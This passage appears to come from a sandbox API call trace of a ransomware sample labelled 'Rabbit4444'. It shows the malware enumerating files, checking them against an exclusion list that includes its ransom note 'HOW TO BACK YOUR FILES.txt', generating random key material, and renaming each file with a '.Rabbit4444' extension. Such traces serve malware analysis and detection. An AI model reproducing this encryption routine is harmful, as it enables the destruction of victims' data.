lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6a0, lpName=0x0) returned 0x298 [0058.949] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6a0) returned 0x70000 [0058.949] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.950] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0058.950] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.950] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0058.950] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.950] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0058.950] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.950] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0058.950] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15026075694) returned 1 [0058.950] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0058.950] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101b78 | out: hHeap=0xe0000) returned 1 [0058.950] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.950] CloseHandle (hObject=0x298) returned 1 [0058.950] CloseHandle (hObject=0x278) returned 1 [0058.950] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{693E4EF5-9060-469B-AB2E-948B6B68A883}.settingcontent-ms.Rabbit4444") returned 192 [0058.950] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{693E4EF5-9060-469B-AB2E-948B6B68A883}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{693e4ef5-9060-469b-ab2e-948b6b68a883}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{693E4EF5-9060-469B-AB2E-948B6B68A883}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{693e4ef5-9060-469b-ab2e-948b6b68a883}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.951] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50ee5263, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x50ee5263, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x231d0415, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3bf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{6A10BC7B-2586-4B57-A5AA-C14BDE743DC4}.settingcontent-ms", cAlternateFileName="CLA1B0~1.SET")) returned 1 [0058.951] lstrcmpiW (lpString1="Classic_{6A10BC7B-2586-4B57-A5AA-C14BDE743DC4}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.951] lstrcmpiW (lpString1="Classic_{6A10BC7B-2586-4B57-A5AA-C14BDE743DC4}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.951] lstrcmpiW (lpString1="Classic_{6A10BC7B-2586-4B57-A5AA-C14BDE743DC4}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.951] lstrcmpiW (lpString1="Classic_{6A10BC7B-2586-4B57-A5AA-C14BDE743DC4}.settingcontent-ms", lpString2=".") returned 1 [0058.951] lstrcmpiW (lpString1="Classic_{6A10BC7B-2586-4B57-A5AA-C14BDE743DC4}.settingcontent-ms", lpString2="..") returned 1 [0058.951] lstrcmpiW (lpString1="Classic_{6A10BC7B-2586-4B57-A5AA-C14BDE743DC4}.settingcontent-ms", lpString2="windows") returned -1 [0058.951] lstrcmpiW (lpString1="Classic_{6A10BC7B-2586-4B57-A5AA-C14BDE743DC4}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.952] lstrcmpiW (lpString1="Classic_{6A10BC7B-2586-4B57-A5AA-C14BDE743DC4}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.952] lstrcmpiW (lpString1="Classic_{6A10BC7B-2586-4B57-A5AA-C14BDE743DC4}.settingcontent-ms", lpString2="boot") returned 1 [0058.952] lstrcmpiW (lpString1="Classic_{6A10BC7B-2586-4B57-A5AA-C14BDE743DC4}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.952] lstrcmpiW (lpString1="Classic_{6A10BC7B-2586-4B57-A5AA-C14BDE743DC4}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.952] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{6A10BC7B-2586-4B57-A5AA-C14BDE743DC4}.settingcontent-ms" | out: lpString1="Classic_{6A10BC7B-2586-4B57-A5AA-C14BDE743DC4}.settingcontent-ms") returned="Classic_{6A10BC7B-2586-4B57-A5AA-C14BDE743DC4}.settingcontent-ms" [0058.952] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{6A10BC7B-2586-4B57-A5AA-C14BDE743DC4}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.952] lstrlenW (lpString="Classic_{6A10BC7B-2586-4B57-A5AA-C14BDE743DC4}.settingcontent-ms") returned 64 [0058.952] lstrlenW (lpString="Rabbit4444") returned 10 [0058.952] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.952] lstrlenW (lpString=".dll") returned 4 [0058.952] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.952] lstrlenW (lpString=".lnk") returned 4 [0058.952] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.952] lstrlenW (lpString=".ini") returned 4 [0058.952] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.952] lstrlenW (lpString=".sys") returned 4 [0058.952] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.952] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{6A10BC7B-2586-4B57-A5AA-C14BDE743DC4}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{6a10bc7b-2586-4b57-a5aa-c14bde743dc4}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.953] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.953] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15026340081) returned 1 [0058.953] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=959) returned 1 [0058.953] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0058.953] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1019e0 [0058.953] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6c0, lpName=0x0) returned 0x298 [0058.954] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6c0) returned 0x70000 [0058.955] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.955] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0058.955] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.955] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0058.955] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.955] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0058.955] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.955] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0058.955] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15026612693) returned 1 [0058.955] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0058.955] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1019e0 | out: hHeap=0xe0000) returned 1 [0058.955] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.956] CloseHandle (hObject=0x298) returned 1 [0058.956] CloseHandle (hObject=0x278) returned 1 [0058.956] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{6A10BC7B-2586-4B57-A5AA-C14BDE743DC4}.settingcontent-ms.Rabbit4444") returned 192 [0058.956] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{6A10BC7B-2586-4B57-A5AA-C14BDE743DC4}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{6a10bc7b-2586-4b57-a5aa-c14bde743dc4}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{6A10BC7B-2586-4B57-A5AA-C14BDE743DC4}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{6a10bc7b-2586-4b57-a5aa-c14bde743dc4}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.957] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5103c7c8, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x5103c7c8, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x231aa1ba, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3c1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{6AE88B06-50B2-46B0-93EA-4B5C73D3A0B5}.settingcontent-ms", cAlternateFileName="CL6D49~1.SET")) returned 1 [0058.957] lstrcmpiW (lpString1="Classic_{6AE88B06-50B2-46B0-93EA-4B5C73D3A0B5}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.957] lstrcmpiW (lpString1="Classic_{6AE88B06-50B2-46B0-93EA-4B5C73D3A0B5}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.957] lstrcmpiW (lpString1="Classic_{6AE88B06-50B2-46B0-93EA-4B5C73D3A0B5}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.957] lstrcmpiW (lpString1="Classic_{6AE88B06-50B2-46B0-93EA-4B5C73D3A0B5}.settingcontent-ms", lpString2=".") returned 1 [0058.957] lstrcmpiW (lpString1="Classic_{6AE88B06-50B2-46B0-93EA-4B5C73D3A0B5}.settingcontent-ms", lpString2="..") returned 1 [0058.957] lstrcmpiW (lpString1="Classic_{6AE88B06-50B2-46B0-93EA-4B5C73D3A0B5}.settingcontent-ms", lpString2="windows") returned -1 [0058.957] lstrcmpiW (lpString1="Classic_{6AE88B06-50B2-46B0-93EA-4B5C73D3A0B5}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.957] lstrcmpiW (lpString1="Classic_{6AE88B06-50B2-46B0-93EA-4B5C73D3A0B5}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.957] lstrcmpiW (lpString1="Classic_{6AE88B06-50B2-46B0-93EA-4B5C73D3A0B5}.settingcontent-ms", lpString2="boot") returned 1 [0058.957] lstrcmpiW (lpString1="Classic_{6AE88B06-50B2-46B0-93EA-4B5C73D3A0B5}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.957] lstrcmpiW (lpString1="Classic_{6AE88B06-50B2-46B0-93EA-4B5C73D3A0B5}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.957] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{6AE88B06-50B2-46B0-93EA-4B5C73D3A0B5}.settingcontent-ms" | out: lpString1="Classic_{6AE88B06-50B2-46B0-93EA-4B5C73D3A0B5}.settingcontent-ms") returned="Classic_{6AE88B06-50B2-46B0-93EA-4B5C73D3A0B5}.settingcontent-ms" [0058.957] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{6AE88B06-50B2-46B0-93EA-4B5C73D3A0B5}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.957] lstrlenW (lpString="Classic_{6AE88B06-50B2-46B0-93EA-4B5C73D3A0B5}.settingcontent-ms") returned 64 [0058.957] lstrlenW (lpString="Rabbit4444") returned 10 [0058.957] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.957] lstrlenW (lpString=".dll") returned 4 [0058.957] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.957] lstrlenW (lpString=".lnk") returned 4 [0058.957] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.957] lstrlenW (lpString=".ini") returned 4 [0058.957] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.958] lstrlenW (lpString=".sys") returned 4 [0058.958] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.958] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{6AE88B06-50B2-46B0-93EA-4B5C73D3A0B5}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{6ae88b06-50b2-46b0-93ea-4b5c73d3a0b5}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.958] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.958] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15026866464) returned 1 [0058.958] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=961) returned 1 [0058.958] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117950 [0058.958] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0058.958] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6d0, lpName=0x0) returned 0x298 [0058.959] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6d0) returned 0x70000 [0058.960] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.960] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0058.960] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.960] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0058.960] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.960] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0058.960] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.961] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0058.961] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15027133074) returned 1 [0058.961] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117950 | out: hHeap=0xe0000) returned 1 [0058.961] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0058.961] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.961] CloseHandle (hObject=0x298) returned 1 [0058.961] CloseHandle (hObject=0x278) returned 1 [0058.961] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{6AE88B06-50B2-46B0-93EA-4B5C73D3A0B5}.settingcontent-ms.Rabbit4444") returned 192 [0058.961] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{6AE88B06-50B2-46B0-93EA-4B5C73D3A0B5}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{6ae88b06-50b2-46b0-93ea-4b5c73d3a0b5}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{6AE88B06-50B2-46B0-93EA-4B5C73D3A0B5}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{6ae88b06-50b2-46b0-93ea-4b5c73d3a0b5}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.962] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x511e0177, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x511e0177, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x231aa1ba, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3e8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{6CA1F1CE-1FED-4D96-A82E-08CEDB139AA3}.settingcontent-ms", cAlternateFileName="CLE661~1.SET")) returned 1 [0058.965] lstrcmpiW (lpString1="Classic_{6CA1F1CE-1FED-4D96-A82E-08CEDB139AA3}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.965] lstrcmpiW (lpString1="Classic_{6CA1F1CE-1FED-4D96-A82E-08CEDB139AA3}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.965] lstrcmpiW (lpString1="Classic_{6CA1F1CE-1FED-4D96-A82E-08CEDB139AA3}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.965] lstrcmpiW (lpString1="Classic_{6CA1F1CE-1FED-4D96-A82E-08CEDB139AA3}.settingcontent-ms", lpString2=".") returned 1 [0058.965] lstrcmpiW (lpString1="Classic_{6CA1F1CE-1FED-4D96-A82E-08CEDB139AA3}.settingcontent-ms", lpString2="..") returned 1 [0058.965] lstrcmpiW (lpString1="Classic_{6CA1F1CE-1FED-4D96-A82E-08CEDB139AA3}.settingcontent-ms", lpString2="windows") returned -1 [0058.965] lstrcmpiW (lpString1="Classic_{6CA1F1CE-1FED-4D96-A82E-08CEDB139AA3}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.965] lstrcmpiW (lpString1="Classic_{6CA1F1CE-1FED-4D96-A82E-08CEDB139AA3}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.965] lstrcmpiW (lpString1="Classic_{6CA1F1CE-1FED-4D96-A82E-08CEDB139AA3}.settingcontent-ms", lpString2="boot") returned 1 [0058.965] lstrcmpiW (lpString1="Classic_{6CA1F1CE-1FED-4D96-A82E-08CEDB139AA3}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.965] lstrcmpiW (lpString1="Classic_{6CA1F1CE-1FED-4D96-A82E-08CEDB139AA3}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.965] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{6CA1F1CE-1FED-4D96-A82E-08CEDB139AA3}.settingcontent-ms" | out: lpString1="Classic_{6CA1F1CE-1FED-4D96-A82E-08CEDB139AA3}.settingcontent-ms") returned="Classic_{6CA1F1CE-1FED-4D96-A82E-08CEDB139AA3}.settingcontent-ms" [0058.965] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{6CA1F1CE-1FED-4D96-A82E-08CEDB139AA3}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.966] lstrlenW (lpString="Classic_{6CA1F1CE-1FED-4D96-A82E-08CEDB139AA3}.settingcontent-ms") returned 64 [0058.966] lstrlenW (lpString="Rabbit4444") returned 10 [0058.966] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.966] lstrlenW (lpString=".dll") returned 4 [0058.966] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.966] lstrlenW (lpString=".lnk") returned 4 [0058.966] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.966] lstrlenW (lpString=".ini") returned 4 [0058.966] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.966] lstrlenW (lpString=".sys") returned 4 [0058.966] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.966] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{6CA1F1CE-1FED-4D96-A82E-08CEDB139AA3}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{6ca1f1ce-1fed-4d96-a82e-08cedb139aa3}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.966] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.966] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15027702411) returned 1 [0058.966] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1000) returned 1 [0058.966] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0058.966] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101380 [0058.966] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6f0, lpName=0x0) returned 0x298 [0058.969] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6f0) returned 0x70000 [0058.970] CryptAcquireContextW (in: phProv=0x130bbd0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x130bbd0*=0x101fb8) returned 1 [0058.971] CryptGenRandom (in: hProv=0x101fb8, dwLen=0x80, pbBuffer=0x130bbec | out: pbBuffer=0x130bbec) returned 1 [0058.971] CryptReleaseContext (hProv=0x101fb8, dwFlags=0x0) returned 1 [0058.971] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.971] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0058.971] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.971] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0058.971] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.971] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0058.971] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.971] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0058.971] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15028194008) returned 1 [0058.971] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0058.971] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101380 | out: hHeap=0xe0000) returned 1 [0058.971] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.971] CloseHandle (hObject=0x298) returned 1 [0058.971] CloseHandle (hObject=0x278) returned 1 [0058.971] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{6CA1F1CE-1FED-4D96-A82E-08CEDB139AA3}.settingcontent-ms.Rabbit4444") returned 192 [0058.972] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{6CA1F1CE-1FED-4D96-A82E-08CEDB139AA3}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{6ca1f1ce-1fed-4d96-a82e-08cedb139aa3}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{6CA1F1CE-1FED-4D96-A82E-08CEDB139AA3}.settingcontent-ms.Rabbit4444" (normalized: 